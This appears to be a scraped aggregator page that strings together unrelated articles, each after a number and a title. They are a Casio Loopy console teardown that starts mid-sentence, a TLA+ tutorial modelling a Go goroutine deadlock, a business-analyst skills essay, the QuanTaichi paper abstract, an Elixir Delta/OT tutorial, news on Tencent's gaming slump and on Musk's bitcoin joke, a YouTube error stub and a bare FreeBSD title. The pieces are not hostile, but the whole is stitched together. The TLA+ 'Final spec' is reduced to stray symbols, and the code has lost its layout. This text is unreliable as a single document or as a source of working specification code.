to separate your pictures. The cartridge eject mechanism, which uses a spring, is a huge pain to remove; it was an even bigger pain to put back on at the end. So look forward to that. Inside, we see the bulk of the circuitry is here, including the SH7021 CPU. Near the CPU we can also see a Sony CXA1645M RGB encoder. This creates the composite video output, which just goes to an RCA plug on the back. The CXA1645M would be a prime place to add an RGB mod, if one wanted better output. However, it being a surface-mount chip makes things a little more tricky to solder to, so I ended up not bothering. For now I think composite is more than enough. The smaller circuitboard is just for power regulation, and it has the actual RCA jacks for audio and video. Interestingly, the power supply that came with the Loopy outputs 24V DC, which is quite a bit higher than most game consoles of the period. The games are cartridge-based. This is a bit of a surprise, as this came out the year after the launch of CD-based consoles like the Sony PlayStation, the NEC PC-FX, and the Sega Saturn. This may have been a cost-saving move for the main console; the game consoles not only contain the game ROM, but also the SRAM used to save the game (there is a battery soldered to the opposite side of the PCB). So what kind of games did the Casio Loopy have? According to a Eurogamer interview, Loopy engineers Tetsuya Hayashi and Kunihiro Matsubara state that they didn’t originally design the console with women in mind; the goal was to provide a unique experience with the stickers. Since young girls liked to play with stickers, that became the target later as the launch lineup was drawn up. By the time commercials were made, the target audience was clear. Which leaves us in a bit of a pickle. I am not a preteen Japanese girl. As a child, I wasn’t really into stickers as their impermanence bothered me. So I’m not sure I can judge this console fairly… But hey, since when has that stopped me? Dream Change is a dress-up game. It’s pretty clear to see what the appeal of this game is to the target audience; you get to choose outfits for your character. Gameplay is controlled through a system of elaborate menus where you can choose the different components of the outfit. It’s not just a sandbox; your outfit can be judged by the game, and meeting the requirements allows you to take your model to various settings. Here, I’m told that I need to do a better job coordinating between heavy and light. At least he’s smiling while doing so. But enough talk. Let’s print a sticker. I’ve got a whole unused new old stock package of sticker stock for the Loopy. Now, the fact that these are so still easily attainable may be a bad sign for the Loopy’s success, but hey, it doesn’t know that. Here’s my girl in her outfit. Even though the game doesn’t like it, I want to remember it, so this is what I want to print. The print goes pretty fast; you can tell that it prints in color as it has to pull the sticker back in and out for each layer. Let’s take a quick look at a 1200dpi scan from my struggling Canon scanner. Forgiving the fadedness, which is from the scanner as we’ll see better colors in the photo below, it looks pretty good; this close up, you can even see detail that the Framemeister-assisted composite capture masks with rainbow bands. The sticker area has quite a bit of “overscan”; for example, the bottom of her shoe will be cut off when I peel it. The thing that’s a real shame, though, is the size. Compare it to a 3.5” floppy disk, as was common at the time, and you can see that a Loopy sticker won’t even cover the entire label area. When you consider the commercial for Little Romance, a game that I don’t have, but which suggests using the seals as panels in a comic book, you can see that they’re pretty tiny for that role. I guess kids do usually have better eyes than adults. Bow-wow Love Story seems to have been one of the more popular games for the system, judging by its wide availability in the aftermarket. It’s an adventure game published by Casio and developed by Alfa System, who also developed Dream Change above, and are credited with contributing work on many great PC Engine games, like Hudson’s port of Ys I&II. They’re also still in business. The game itself is an adventure game telling the story of a girl and her dog. The game is of course all in Japanese, and the story may be too cutesy to be appealing to anyone over the age of 14; it is worth noting that there is a game here, for example, the action segment below, where she combats Miracle Lemon. Should she lose, her eyes will be in pain from the sour lemon juice, so be careful! The stickers in this game definitely come off more of an afterthought than Dream Change; a separate section accessible from the title screen let you print stickers based off of locations you’ve been to before, or special moments. This might remind you of The Legend of Zelda: Link’s Awakening DX, or Super Mario Bros. Deluxe on the Game Boy Color, which supported the Game Boy Printer. And I think that’s a pretty good comparison here; I think had Nintendo somehow ended up in a Philips-like deal with Casio, a port of Super Mario Bros. Deluxe to the Loopy may have been a success. Someone get on that. The Casio Loopy, more than any other piece of hardware I’ve looked at, makes me feel like Julius Caesar above. What I can say, though, is the facts: the Loopy was not a very successful system. In fact, FEMICOM Museum states that only one production run was made, and Octavius’ video review says that the console was discontinued a few weeks after launch. There is a little bit more I’d like to say about the Loopy, but that’ll have to wait. And as for whether I’m going to be making Aspect Star “L”? Uh, don’t hold your breath.
125
Finding Goroutine Bugs with TLA+
My job these days is teaching TLA+ and formal methods: specifying designs to find bugs in them. But just knowing the syntax isn’t enough to write specs, and it helps to have examples to draw from. I recently read Chris Siebenmann’s Even in Go, concurrency is still not easy and thought it would make a good case study for writing a spec. In it, he gives an example of Go code which deadlocks: /*1 */ func FindAll () [] P { //P = process data /*2 */ pss , err := ps . Processes () /*3 */ [ ... ] /*4 */ found := make( chan P ) /*5 */ limitCh := make( chan struct {}, concurrencyProcesses ) /*6 */ /*7 */ for _ , pr := range pss { /*8 */ limitCh <- struct {}{} /*9 */ pr := pr /*10*/ go func () { /*11*/ defer func () { <- limitCh }() /*12*/ [ ... get a P with some error checking ... ] /*13*/ found <- P /*14*/ }() /*15*/ } /*16*/ [ ... ] /*17*/ /*18*/ var results [] P /*19*/ for p := range found { /*20*/ results = append( results , p ) /*21*/ } /*22*/ return results /*23*/ } The bug is that the goroutines only receive from limitCh to release their token after sending their result to the unbuffered found channel, while the main code only starts receiving from found after running through the entire loop, and the main code takes the token in the loop and blocks if no tokens are available. Let’s model this in TLA+! Note: this example assumes some basic knowledge of TLA+ and PlusCal. If you know what a process label is, then you’re fine. We’re not looking at race conditions so you shouldn’t need to know the finer points of labels and actions, but it might make things more intuitive. I included syntax explanations where appropriate. It also assumes some basic knowledge of Go, which I am in no way qualified to explain. It’s good to start with some upfront thinking of how we are going to approach this problem. There’s two parts to formally specifying something: describing the system and describing the properties of the system. In this case we can ignore the second part, since we’re only looking for deadlocks. It would be good modeling practice to add sanity check properties, like type invariants, but they are not strictly necessary. We have a choice of doing everything in TLA+ or using a mix of TLA+ and PlusCal, a sequential algorithm DSL that compiles to TLA+. Since the Go code is highly sequential and because PlusCal is easier for outsiders to understand, I will use PlusCal. This will cause a bit of impedance mismatch down the road for unbuffered channels but overall it’s a net benefit. The core structure of a PlusCal spec is a set of defined processes with both local and global state. At the very least we will have one process for main and one process for each of the goroutines. There are three “complex bits” to Chris’s code sample: go, defer, and the nature of Go channels. defer runs cleanup code when a goroutine is finished running. For now we’ll represent this by moving the deferred code to its own label, but we could also use a PlusCal procedure to be more accurate. go spawns a new goroutine. Since PlusCal requires us to define all of our processes in advance, we can’t “spawn” a new goroutine. What we can do instead is define each process but prevent them from running. Then we add a flag that says whether or not the goroutine was initialized in the behavior yet. It would look something like this: variables initialized = [w \in Routines |-> FALSE]; \* ... process goroutine \in Routines begin Work: await initialized[self]; \* ... So each goroutine awaits being initialized by the main process before it does anything. This is how we can emulate spawning new processes. That leaves the channels, which are the most complicated part to specify. There are two kinds of Go channels: buffered and unbuffered. Sends to a buffered channel are blocked if the channel is full. Receives from a buffered channel are blocked if the channel is empty. Both of these are representable with PlusCal macros: macro send_buffered(chan) begin await channels[chan] < buffered[chan]; channels[chan] := channels[chan] + 1 ; end macro ; macro receive_buffered(chan) begin await channels[chan] > 0 ; channels[chan] := channels[chan] - 1 ; end macro ; For the purposes of pedagogy I’m not modeling what we actually read or write. This is good practice when writing real-world specs too: write the simplest specification that usefully captures behavior and iteratively add detail to that. That covers buffered channels. Unbuffered channels, by contrast, always block unless there is both a sender and receiver. In pure TLA+ this wouldn’t be too tricky to specify, but PlusCal assumes each step of the behavior is one process doing one thing. Unbuffered channels can’t be represented natively without adding some annoying bookkeeping, as we need to have one process block “first”. We’ll address that when we get to the spec. So now that we know a rough approach and what the pain points are likely to be, let’s write the spec. ---- MODULE channels ---- EXTENDS Integers, TLC, Sequences CONSTANTS NumRoutines, NumTokens Routines == 1 .. NumRoutines (* --algorithm channels variables channels = [tokens |-> 0 , found |-> {}]; buffered = [tokens |-> NumTokens]; initialized = [w \in Routines |-> FALSE]; channels is the current contents of each channel. For buffered channels, we treat their contents as a single number and store the maximum capacity in a separate buffered variable. For unbuffered channels, we instead store the set of senders waiting for a receiver. initialized is for emulating goroutines. macro go(routine) begin initialized[routine] := TRUE; end macro An extra macro I added to more closely match the Go syntax. macro write_buffered(chan) begin await channels[chan] < buffered[chan]; channels[chan] := channels[chan] + 1 ; end macro ; macro receive_channel(chan) begin if chan \in DOMAIN buffered then await channels[chan] > 0 ; channels[chan] := channels[chan] - 1 ; else await channels[chan] /= {}; with w \in channels[chan] do channels[chan] := channels[chan] \ {w} end with ; end if ; end macro ; This is a change from our old read_buffered because it handles both buffered and unbuffered channels. Buffered channels work as expected. For unbuffered channels, we wait for the set of blocked writers to be nonempty and nondeterministically declare that we read from one of them. procedure write_unbuffered(chan) begin DeclareSend: channels[chan] := channels[chan] \union {self}; Send: await self \notin channels[chan]; return ; end procedure To model unbuffered channels we can either put state on senders or put state on receivers. I opted to place it on the sender because Go permits reading from multiple unbuffered channels at once. In two separate temporal steps we 1) add the process to the set of channel senders and 2) wait to be removed from that set by a receiver. process goroutine \in Routines begin A: await initialized[self]; call write_unbuffered( "found" ); B: receive_channel( "tokens" ); end process ; Our goroutine process is a straightforward translation of the Go code. First we wait for the goroutine to be initialized, corresponding to line 10. Then we write to the found channel (line 13). If I was trying to be more faithful I would write special defer semantics, but for this I’m happy to just stick it on a label at the end of the process. process main = 0 variables i = 1 ; begin Main: while i <= NumRoutines do write_buffered( "tokens" ); go(i); i := i + 1 ; end while ; Get: while i > 1 do i := i - 1 ; receive_channel( "found" ); end while ; end process ; end algorithm; *) TLA+ doesn’t have a native for loop, so we have to emulate it with while. Unlike programming languages, we count 1..N, not 0..(N-1). Our emulation uses one token to initialize each goroutine. Since write_channel has an await in it, it will block if there are more goroutines than tokens. It will then stay blocked until a goroutine releases a token. Final spec: show spec 1 = 0 , = = < + 1 ; ; > 0 ; - 1 ; w \ ; ; ; ; ; = 0 i = 1 ; i i i + 1 ; ; i > 1 i i - 1 ; ; ; Now that we have a full spec, we can use the model checker, TLC, to see if it satisfies any properties. We didn’t specify any, but TLC will check for deadlocks by default. I’m going to model check it with 3 goroutines and 2 tokens. It’s the same issue that Chris had. The goroutines can only return their tokens if there is a receiver on the found channel, the only receiver of that channel is main, main only reads after it initializes all the goroutines, and main will block if there are more goroutines than tokens. The goroutines can’t return tokens until all goroutines are initialized, and main can’t initialize all goroutines until some goroutines have returned their tokens. Chris suggests three possible ways of fixing this. We can test each of the three by modifying our spec: If the goroutines took the token by sending to limitCh instead of the main for loop doing it, the bug would not exist; process goroutine \in Routines begin A: await initialized[self]; + write_buffered("limitCh"); \* ... while i <= NumRoutines do - write_buffered("limitCh"); initialized[i] := TRUE; i := i + 1; end while; If the goroutines received from limitCh to release their token before sending to found, it wouldn’t exist (but because of error handling, it’s simpler and more reliable to do the receive in a defer). process goroutine \in Routines begin A: await initialized[self]; + receive_channel("limitCh"); - call write_unbuffered("found"); B: - receive_channel("limitCh"); + call write_unbuffered("found"); end process; And if the entire for loop was in an additional goroutine… This one’s a little more complicated. We create a new process for the loop and add its identifier to initialized. I’ll use -1 to represent the for loop. initialized = [w \in Routines \union { - 1 } |-> FALSE]; \* After goroutines process for_loop = - 1 variables i = 1 ; begin Loop: while i <= NumRoutines do write_buffered( "limitCh" ); go(i); i := i + 1 ; end while ; end process ; Then we modify main to initialize this instead of doing the loop itself: process main = 0 variables i = NumRoutines; begin Main: go( - 1 ); Get: while i > 0 do i := i - 1 ; receive_channel( "found" ); end while ; end process ; Ultimately we wrote about 75 lines of specification to test 20 lines of Go code. Over half the spec is channel logic which we can now reuse in other specs. Discounting those puts us a little closer, though I’ll admit that a real TLA+ spec would be a lot longer because you’d be writing a lot more sanity checking properties. Noneless, writing the TLA+ version wouldn’t be significantly more effort than writing the original version and could save you net time if it caught the deadlock before production. Obviously I’m inclined towards using TLA+, given it’s my professional language of choice. However, I suspect that TLA+ isn’t exactly the right tool for modeling Go channels. That’s because there’s another formal method, called Spin, which is much closer to Go’s native semantics. It even has channels as a native datatype. I’ve not used Spin so cannot comment on how effective it truly is but I imagine it would work very well in this domain. It’s also been used before to model the runtime scheduler, though that spec was removed when it eventually fell out of sync. You can see a Spin specification of the same problem here. If you’re interested in learning more about formal methods, I wrote a book and am running a 3-day TLA+ workshop in October. You can also follow my newsletter where I discuss formal methods techniques and patterns. Thanks to Richard Whaling and Damian Gryski for feedback. I shared the first draft of this essay on my newsletter. If you like my writing, why not subscribe?
1
T-Shaped Skills – How a Versatile BA Can Improve Your Operations
Nowadays, successful business analysis is much more than just requirements management and engineering. Being agile, the ability to overcome conflicts, customer experience focus, and leveraging technological solutions are just a few examples of competencies required by the business. The perception of the Business Analyst role is changing, it’s becoming more holistic, and focuses on facilitating outcomes from the general to the specific. However, one thing hasn’t changed. Core Business Analyst skills such as problem-solving, analytical thinking, communication, self-organisation and willingness to learn are more crucial than ever. They are the foundation for becoming an effective BA and growing in this role. What’s changing is that a broader set of skills may be very beneficial when used well. The answer to those needs is the concept of T-shaped skills as a metaphor to describe the person’s abilities1, represented in two dimensions: This model promotes individuals with broader skillsets. People that are capable of adapting and delivering value in the face of a greater variety of demands. The key points/biggest advantages of this concept are individualisation and profiles. In the demanding era of digital transformation, I believe there are a few profiles, which are important for the role that are very much connected to the ‘many hats’ the BAs are wearing nowadays. To name some of them: With a growing focus on the discovery and prototyping phases, BAs are expected to help with solution design and the involvement of end users in the process. Focus on customer-centric solutions and end user experience allows for delivering not only an answer to a problem, but a solution that users will use and adapt in their daily routines. Design thinking and an openness to innovation (usually coming from a UX expert), can bring new ideas for solution design. Therefore, these competencies and project roles are very close. Thanks to that fact, people who hold these positions can learn from each other. Keeping up with the latest technology trends is currently one of the most important skills to facilitate better business outcomes. Cloud solutions, low-code platforms (i.e. Mendix, OutSystems), COTS solutions and chatbots, are just a few examples of areas where the technology shift is heading. Technology awareness and a high-level understanding of various alternatives greatly helps solve busines problems and find opportunities. Some BAs are proficient with these technologies (as former developers or quality engineers), which can be very beneficial for their growth in this role. It has become a natural path to start a Business Analyst career as a Product Owner. Very often in the projects, BAs work very closely with POs. Product Ownership or Product Management is not about how decisions are made, but about the constant focus on maximising the value of the products, the same as in analysis. Therefore, the BA is a strategic role responsible for representing the interests of the customer in front of the development team. The second role that works hand in hand with the Business Analyst is the Project Manager. Understanding project metrics, deliverables, and budgets allows for making better decisions when it comes to delivery. The responsibilities of a Business Analyst very frequently overlap with the ones of a Consultant. The role of a Consultant is often a career path for an experienced Business Analyst. Customer awareness, business strategy and readiness, big picture thinking and cost-benefit analysis are skills that every Business Analyst will use in a large-scale project. In the Objectivity BA Practice, we emphasise the development of the fundamental skills for the BA role, but at the same time, we create a culture that encourages continuous learning and an open mindset. It supports the development of individuals with T-shaped skillsets, which is beneficial for all sides: the company, our clients, and our employees. A Business Analyst with a T-shaped skillset can help an organisation to: And, at the same time, for the Business Analyst as an individual, the T-shaped skills: Specialisation is extremely important, as without deep knowledge in a professional area, we can’t build trust and effectiveness. On the other hand as BAs we have various backgrounds (technical or non-technical) and skills. A Business Analyst who utilises all their skills will be better equipped for the challenges role can face during digital transformation. BAs with T-shaped skills can be much more than bridges between IT and business—they can be the people who are capable of bringing greater value inside the team as well as to the organisation. 1 E arliest popular reference  of the model was published  by David Guest in 1991 , then used by  Tim Brown, CEO of the  p .
49
QuanTaichi: A Compiler for Quantized (“Low-Precision”) Simulations on the GPU
QuanTaichi: A Compiler for Quantized Simulations Yuanming Hu , Jiafeng Liu , Xuanda Yang , Mingkuan Xu , Ye Kuang , Weiwei Xu , Qiang Dai , William T. Freeman , Fredo Durand February 2021 Abstract High-resolution simulations can deliver great visual quality, but they are often limited by available memory, especially on GPUs. We present a compiler for physical simulation that can achieve both high performance and significantly reduced memory costs, by enabling flexible and aggressive quantization. Low-precision (“quantized”) numerical data types are used and packed to represent simulation states, leading to reduced memory space and bandwidth consumption. Quantized simulation allows higher resolution simulation with less memory, which is especially attractive on GPUs. Implementing a quantized simulator that has high performance and packs the data tightly for aggressive storage reduction would be extremely labor-intensive using traditional programming languages. To make the creation of quantized simulation practical, we have developed a new set of language abstractions and a compilation system. A suite of tailored domain-specific optimizations ensure quantized simulators often run as fast as the full-precision simulators, despite the overhead of encoding-decoding the packed quantized data types. Our programming language and compiler, based on Taichi, allow developers to effortlessly switch between different full-precision and quantized simulators, to explore the full design space of quantization schemes, and ultimately to achieve a good balance between space and precision. The creation of quantized simulation with our system has large benefits in terms of memory consumption and performance. For example, on a single GPU, we can simulate a Game of Life with 20 billion cells (8× compression per pixel), an Eulerian fluid system with 421 million active voxels (1.6× compression per voxel), and a hybrid Eulerian-Lagrangian elastic object simulation with 235 million particles (1.7× compression per particle). At the same time, quantized simulations create physically plausible results. Our quantization techniques are complementary to existing acceleration approaches of physical simulation: they can be used in combination with these existing approaches, such as sparse data structures, for even higher scalability and performance. Type Conference paper Publication SIGGRAPH 2021 More info: Supplemental document
5
Delta (OT) for Elixir
Today, we at Slab are excited to open-source our Elixir implementation of Delta – an expressive format to describe contents and changes. Deltas are what power Slab's real-time collaborative editor, as well as the core data layer behind Quill, the popular rich-text editor for JavaScript. Deltas can describe any rich text document, including all text and formatting information, but without the ambiguity and complexity of HTML. When we set out to build a knowledge-base that teams would love to use, we knew that real-time collaboration had to be a key part of it. The Delta format in JavaScript was already a part of building and open-sourcing Quill, complete with support for Operational Transform (OT). So it seemed appropriate to use Quill and Delta for Slab too. We needed an Elixir implementation on the server as well which would accept the document diffs from the clients running in the browser, perform concurrency control and conflict resolution as part of synchronization, and update the document on the server and on clients in real-time. The core functionality of Delta is to track a document's contents and how it changes. Take the following document with the text "Gandalf the Grey" with "Gandalf" bolded and "Grey" in grey: alias Delta . Op gandalf = [ Op . insert ( "Gandalf" , % { "bold" => true } ) , Op . insert ( " the " ) , Op . insert ( "Grey" , % { "color" => "#ccc" } ) , ] We can define a new change (intended to be applied to above), that keeps the first 12 characters, deletes the next 4, and inserts "White" text in white: death = [ Op . retain ( 12 ) , Op . delete ( 4 ) , Op . insert ( "White" , % { "color" => "#fff" } ) , ] Applying this change on our document results in: Delta . compose (gandalf, death) Here's a quick rundown of the features supported by Delta: The Delta format tracks the contents of documents, their formatting, attributes and changes over-time concisely and without ambiguity, allowing you to have a consistent data representation across different platforms. Delta implements the OT algorithm including compose, transform and invert. This is especially useful when building collaboration functionalities with concurrency and conflict-resolution. Delta supports generalized formatting with arbitrary attributes over a range of text. How they behave is up to you. Other than formatting, they can be used for tracking changes (including author or time), comments, annotations and references. Op . insert ( "Slab <3 Elixir" , % { "comment_thread_id" => 123 } ) Delta has built-in support for simple embeds (e.g. image/video from a link), but is also configurable and extendable with custom handlers for more complex embed needs. This allows defining custom logic for composing and transforming the content inside embeds. Op . insert ( % { "image" => "https://app.com/logo.png" } , % { "alt" => "App Logo" } ) A real-life example would be utilizing the OTP features in Elixir to create a Document server which clients could connect to and perform updates to a document, fetch older versions, or undo operations. Here's how you can write a simple implementation in Elixir that supports these features: Let's start by writing a simple GenServer that represents a document and can return its contents: defmodule Document do use GenServer @initial_state % { contents: [ ] } def start_link, do: GenServer . start_link (__MODULE__, :ok ) def get_contents (pid) , do: GenServer . call (pid, :get_contents ) @impl true def init ( :ok ) , do: { :ok , @initial_state } @impl true def handle_call ( :get_contents , _from, state) do { :reply , state.contents, state} end end Clients can now create and connect to our Document processes, fetching the contents (although they'll always be empty for now): { :ok , pid} = Document . start_link ( ) Document . get_contents (pid) Next, we'll add support for updating the document. The Document server should be able to accept changes or diffs, apply them, and return the up-to-date contents. We'll add a new update(pid, change) method and a corresponding callback: defmodule Document do def update (pid, change) , do: GenServer . call (pid, { :update , change} ) @impl true def handle_call ( { :update , change} , _from, state) do contents = Delta . compose (state.contents, change) state = % { contents: contents} { :reply , contents, state} end end Now clients can make changes to the document: Document . get_contents (pid) Document . update (pid, [ Op . insert ( "Hello!" ) ] ) Document . update (pid, [ Op . retain ( 5 ) , Op . insert ( " world" ) ] ) It will be really helpful if clients can undo the last change quickly. While we can certainly keep track of all changes performed on the document, a better strategy would be to keep track of the "inverted" changes. For every change to a document, there exists an inverted version which cancels the effect of that change. Simply applying this inverted change will return the document contents prior to the change. Delta supports this through the invert method: base = [ Op . insert ( "Jon: King in the North" ) ] change = [ Op . retain ( 5 ) , Op . delete ( 7 ) , Op . insert ( "Warden of" ) ] inverted = Delta . invert (change, base) updated = Delta . compose (base, change) Delta . compose (updated, inverted) We can use this to implement the "undo" functionality. We'll update our state map to include an inverted_changes key and while we're at it let's also include a version integer to track how many changes have been performed on the document so far. Next, we'll modify our :update callback to push the inverted change in the list. defmodule Document do @initial_state % { version: 0 , contents: [ ] , inverted_changes: [ ] , } @impl true def handle_call ( { :update , change} , _from, state) do inverted = Delta . invert (change, state.contents) state = % { version: state.version + 1 , contents: Delta . compose (state.contents, change) , inverted_changes: [inverted | state.inverted_changes] , } { :reply , state.contents, state} end end Finally, we'll add an undo(pid) method and a corresponding callback that simply reverts the last change. defmodule Document do def undo (pid) , do: GenServer . call (pid, :undo ) @impl true def handle_call ( :undo , _from, % { version: 0 } = state) do { :reply , state.contents, state} end @impl true def handle_call ( :undo , _from, state) do [last_change | changes] = state.inverted_changes state = % { version: state.version - 1 , contents: Delta . compose (state.contents, last_change) , inverted_changes: changes, } { :reply , state.contents, state} end end Note that the first :undo function clause handles documents with no changes, in which case it doesn't do anything. Let's try it out in IEx: { :ok , pid} = Document .start_link Document . update (pid, [ Op . insert ( "Hello world!" ) ] ) Document . update (pid, [ Op . retain ( 6 ) , Op . delete ( 5 ) , Op . insert ( " Elixir" ) ] ) Document . undo (pid) Document . undo (pid) We want to allow clients to observe how a document changed over time. Like our undo functionality, one way would be to keep track of all changes and "replay" them on an empty document one-by-one to achieve our desired result, but since we're already tracking inverted changes, we can instead start from the current state of the document and revert the changes until we get to our document's initial state. Again, we'll add a public get_history(pid) method and a corresponding callback that implements its functionality: defmodule Document do def get_history (pid) , do: GenServer . call (pid, :get_history ) @impl true def handle_call ( :get_history , _from, state) do current = {state.version, state.contents} history = Enum . scan (state.inverted_changes, current, fn inverted, {version, contents} -> contents = Delta . compose (contents, inverted) {version - 1 , contents} end ) { :reply , [current | history] , state} end end Here we use Enum.scan/3 to compose each inverted change in the reverse order, until we get to the beginning, finally returning a list of document versions and contents at each point. Trying it out: Document . update (pid, [ Op . insert ( "Slab <3 Ruby" ) ] ) Document . update (pid, [ Op . retain ( 8 ) , Op . delete ( 4 ) , Op . insert ( "Elixir" ) ] ) Document . update (pid, [ Op . retain ( 8 ) , Op . retain ( 6 , % { "italic" => true } ) ] ) Document . get_history (pid) Similarly, we might want to allow clients to view the diff between two versions of the document in any order. In this case, it might be useful to store both changes and the inverted_changes so we can start from any point in the document's history and quickly go both forward and backward. Continuing from our current implementation, this would not be much harder and so, this exercise is left for our readers. Combining all of the above, the final code for our Document server looks like this: defmodule Document do use GenServer @initial_state % { version: 0 , contents: [ ] , inverted_changes: [ ] , } def start_link, do: GenServer . start_link (__MODULE__, :ok ) def stop (pid) , do: GenServer . stop (pid) def update (pid, change) , do: GenServer . call (pid, { :update , change} ) def get_contents (pid) , do: GenServer . call (pid, :get_contents ) def get_history (pid) , do: GenServer . call (pid, :get_history ) def undo (pid) , do: GenServer . call (pid, :undo ) @impl true def init ( :ok ) , do: { :ok , @initial_state } @impl true def handle_call ( { :update , change} , _from, state) do inverted = Delta . invert (change, state.contents) state = % { version: state.version + 1 , contents: Delta . compose (state.contents, change) , inverted_changes: [inverted | state.inverted_changes] , } { :reply , state.contents, state} end @impl true def handle_call ( :get_contents , _from, state) do { :reply , state.contents, state} end @impl true def handle_call ( :get_history , _from, state) do current = {state.version, state.contents} history = Enum . scan (state.inverted_changes, current, fn inverted, {version, contents} -> contents = Delta . compose (contents, inverted) {version - 1 , contents} end ) { :reply , [current | history] , state} end @impl true def handle_call ( :undo , _from, % { version: 0 } = state) do { :reply , state.contents, state} end @impl true def handle_call ( :undo , _from, state) do [last_change | changes] = state.inverted_changes state = % { version: state.version - 1 , contents: Delta . compose (state.contents, last_change) , inverted_changes: changes, } { :reply , state.contents, state} end end Here's a quick recap of all the features supported by our GenServer and how they work. Clients can create new documents or make changes to existing ones by interacting with our API: { :ok , pid} = Document .start_link Document . update (pid, [ Op . insert ( "Hello!" ) ] ) Document . update (pid, [ Op . retain ( 5 ) , Op . insert ( " world" ) ] ) Document . update (pid, [ Op . retain ( 6 ) , Op . delete ( 5 ) , Op . insert ( "Elixir" , % { "color" => "purple" } ) ] ) Document . get_history (pid) Document . undo (pid) Document . get_history (pid) Elixir is the modern technology of choice today in building scalable and concurrent real-time applications. Phoenix in 2015 made waves in supporting 2 million simultaneous clients. With the release of Delta, we hope to help address the difficult real-world challenge of conflict resolution, in order to enable highly collaborative real-time experiences. Running reliably in production at Slab for almost 4 years now, we're confident in sharing a core piece of our technology with the Elixir community, and excited to see what applications and experiences you build from it. We'd love to hear your comments, feedback and if there's anything else about Elixir or OTP you would like to learn more about.
11
Tencent tanks 10% after Chinese media calls online gaming ‘opium’
Shares of Tencent and NetEase plunged on Tuesday after Chinese state media branded online gaming "opium." The article also called for further restrictions on the industry in order to prevent addiction and other negative impacts on children. The article, by Economic Information Daily, a Chinese state-run publication, said online gaming addiction among children is "widespread" and could negatively impact their growth. It was deleted a few hours after publication. A logo of Tencent is seen during the World Internet Conference (WIC) in Wuzhen, Zhejiang province, China, November 23, 2020. Aly Song | Reuters GUANGZHOU, China — Shares of Tencent and NetEase plunged on Tuesday after Chinese state media branded online gaming "opium" and likened it to a drug. The article also called for further restrictions on the industry in order to prevent addiction and other negative impacts on children. related investing news Morgan Stanley: This stock provides a cheaper way to play Nvidia's A.I. boom The article was deleted a few hours after publication but has since been re-published with a new headline and references to "opium" removed. Tencent shares closed around 6% lower, while NetEase closed down almost 8% in Hong Kong, with both companies clawing back some earlier losses. Tencent is one of the world's largest gaming companies responsible for high-profile games like "Honor of Kings." NetEase declined to comment. Tencent was not immediately available for comment. The article, by Economic Information Daily, a Chinese state-run publication that's affiliated to the official Xinhua newspaper, said that online gaming addiction among children is "widespread" and could negatively impact their growth. The article said that in 2020, more than half China's children were nearsighted and online games affects their education. The sentiment in the article is not that new. For a long time, the Chinese government has been concerned about the impact of video games on minors. In 2018, Beijing froze new game approvals over concerns that gaming was impacting youngsters' eyesight. In China, online games require approvals from the regulators. In 2019, China brought in rules that banned those under 18 years from playing online games between 10 p.m. and 8 a.m. and restricted the amount of time they could play. watch now "The article brought attention to gaming addiction among minors. It is reminiscent of older articles where video games were compared to digital heroin," said Daniel Ahmad, senior analyst at Niko Partners. "The timing of the article has raised concern among investors given the recent crackdown on tech companies and the education/tutoring sector." The article also called for more control over the amount of time children are playing games for and review content of games more stringently to reduce the amount of "improper" information shown to minors. "For the next step, there should be stricter controls over the amount of time minors play online games. It should be reduced by large amount from current level," the article said, according to a CNBC translation. Both NetEase and Tencent have introduced measures to protect young players including real-name registrations to play games. Last month, Tencent introduced a facial recognition feature on smartphones to verify that the gamer is an adult. But after the publication of the article on Tuesday, Tencent announced further gaming restrictions It will reduce the amount of time those under 18 years old can play the company's games on non-holiday days from 90 minutes to one hour and on holidays from 3 hours to 2 hours. Tencent will also bar children under 12 years old from spending money in the game. The gaming giant said it will also crack down on identity fraud to find minors who are using adults' accounts to play games. These new measures will begin with Tencent's "Honor of Kings" game and eventually roll out to other titles. Tencent also called for the whole industry to discuss the feasibility of banning gaming for children under 12. Ahmad noted that most revenue in China is generated by players who are 18 years old and above. "If more measures come into place to prevent youth addiction to gaming, it won't stop revenue generating gamers from playing," Ahmad said.
5
Elon Musk suggests Bitcoin is ‘ghost money’
Sign up to our free weekly IndyTech newsletter delivered straight to your inbox Sign up to our free IndyTech newsletter SIGN UP I would like to be emailed about offers, events and updates from The Independent. Read our privacy notice Thanks for signing up to the IndyTech email {{ #verifyErrors }}{{ message }}{{ /verifyErrors }}{{ ^verifyErrors }}Something went wrong. Please try again later{{ /verifyErrors }} Elon Musk has responded to a request for cryptocurency investment advice by suggesting that bitcoin is ghost money. The SpaceX and Tesla CEO, who became the world’s third richest person this week, made the claim amid a surge in the price of bitcoin that could see it surpass its record high from 2017. Bitcoin is currently trading at around $17,400 (£13,000) – less than $3,000 off its all-time high – having fallen to below $5,000 earlier this year. The surge in value has attracted renewed interest in the cryptocurrency, with Game of Thrones star Maisie Williams tweeting a poll on Monday asking: “Should I go long on bitcoin?” More than 800,000 people voted ‘no’, but thousands of people replied with various memes encouraging her to invest. Mr Musk replied with a reference to a song from The Witcher series, stating, “Toss a bitcoin to ur Witcher.” Another Twitter user responded with one of the earliest bitcoin memes, which features a picture of a wizard with the text “Magic internet money/ Join us". Mr Musk continued the thread with a cryptic message of a ghost emoji and a stack of dollar bills emoji. He also linked to an article from the satirical news site The Onion, featuring the term “ghost money”. The article is from 2017 and was published just before bitcoin experienced its record-breaking price surge. It stated: “At press time, bitcoin had recouped some of its losses, which experts attributed to the fact that even ghost money best suited for anonymously buying heroin could sometimes rebound.” His mention of cryptocurrency once again attracted scammers, who attempted to extort his followers of cryptocurrency by imitating his username and profile picture and calling for people to send bitcoin to an anonymous address. Analysis by The Independent in 2018 found that more than 400 people sent thousands of dollars worth of cryptocurrency to scammers in hopes of receiving more money back. Earlier this year, Mr Musk claimed that the issue had reached “new levels” on Twitter and called on CEO Jack Dorsey to take further action. “This is not cool,” he tweeted. “Troll/ bot networks on Twitter are a dire problem for adversely affecting public discourse and ripping people off.” Twitter said at the time that it has rules in place forbidding such activity and claimed it was “constantly adapting to bad actors’ evolving methods” in order to prevent scams on its platform.
1
Azure Cost Management API Avec PowerShell Et Universal Dashboard (French)
Your browser isn’t supported anymore. Update it to get the best YouTube experience and our latest features. Learn more
1
FreeBSD 13.0: Full Desktop Experience
